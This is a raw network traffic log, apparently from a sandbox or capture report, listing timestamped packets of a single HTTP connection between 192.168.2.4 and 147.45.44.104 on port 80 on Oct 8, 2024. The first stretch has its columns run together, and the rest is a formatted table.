                                                  Oct 8, 2024 03:30:55.211337090 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211345911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211363077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211371899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211415052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211416006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211433887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211450100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211464882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211474895 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211482048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211513042 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211522102 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211539030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211569071 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.259954929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.297880888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298175097 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298197985 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298214912 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298232079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298248053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298254013 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298264980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298285961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298291922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298291922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298327923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298866034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298882961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298907995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298923969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298937082 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298955917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298974037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.298979044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.298990011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299025059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299024105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299041986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299062014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299072981 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299077988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299096107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299113035 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299148083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299185038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299200058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299215078 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299232006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299243927 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299247026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299263954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299273014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299280882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299297094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299312115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299326897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299335003 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299354076 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299367905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299381018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299401999 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299411058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299423933 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299427032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299444914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299460888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299474955 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299489975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299510002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299516916 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299534082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299549103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299561024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299565077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299595118 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299609900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299612045 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299627066 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299643040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299654007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299669027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299674034 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299683094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299700022 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299716949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299720049 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299736023 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299741030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299753904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299772024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299786091 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299802065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299817085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299815893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299832106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299860954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299861908 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299877882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299894094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299906015 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299909115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299937963 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.299940109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299957037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299977064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.299988031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300021887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300259113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300396919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300410986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300437927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300450087 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300457001 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300467014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300483942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300497055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300518990 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300523996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300540924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300558090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300574064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300579071 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300601959 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300604105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300617933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300633907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300651073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300651073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300668001 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300685883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300708055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300710917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300728083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300743103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300760031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.300767899 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300803900 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.300981998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301013947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301029921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301057100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301073074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301086903 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301103115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301105022 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301105022 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301124096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301140070 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301141977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301158905 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301176071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301184893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301204920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301207066 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301207066 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301225901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301232100 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301249027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301255941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301270962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301290035 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301290989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301311970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301326990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301333904 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301333904 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301345110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301352978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301361084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301368952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301378965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301436901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301436901 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301532984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301554918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301572084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301588058 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301593065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301609039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301641941 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301680088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301697016 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301721096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301731110 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301738024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301753998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301759005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301770926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301794052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301796913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301815033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301830053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301860094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301862001 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301877975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301889896 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301899910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301914930 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301922083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301937103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301953077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301956892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.301968098 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301985025 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.301987886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.302004099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.302018881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.353832960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390778065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390799999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390815973 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390830994 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390849113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390865088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390882969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390899897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.390997887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390997887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.390999079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391235113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391268015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391284943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391300917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391308069 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.391328096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.391335011 CEST4973080192.168.2.4147.45.44.104
Timestamp                            Source Port  Dest Port   Source IP       Dest IP
Oct 8, 2024 03:30:55.391347885 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391371965 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391386986 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391402006 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391418934 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391436100 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391443014 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391474009 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391509056 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391525984 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391540051 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391546011 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391551971 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391567945 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391578913 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391597033 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391632080 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391654968 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391669989 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391701937 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391702890 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391731977 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391748905 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391752005 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391767979 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391783953 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391794920 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391802073 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391819000 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391830921 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391838074 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391855955 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391860962 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391911983 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.391920090 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391962051 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.391977072 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392014980 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392014980 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392041922 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392059088 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392060995 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392076969 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392093897 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392106056 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392112017 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392129898 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392143965 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392158031 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392178059 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392178059 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392194986 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392211914 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392224073 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392225981 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392242908 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392257929 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392271042 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392287970 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392291069 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392304897 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392322063 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392335892 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392342091 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392369032 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392388105 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392405987 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392421961 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392431974 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392438889 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392457962 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392468929 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392476082 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392502069 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392571926 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392589092 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392605066 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392621040 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392620087 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392641068 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392644882 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392658949 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392678976 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392683983 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392724037 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392724037 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392740965 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392755032 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392772913 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392781019 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392790079 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392815113 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392853975 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392869949 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392884970 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392901897 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392901897 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392918110 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392929077 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392935038 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392952919 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392961979 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.392970085 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.392988920 CEST  80           49730       147.45.44.104   192.168.2.4
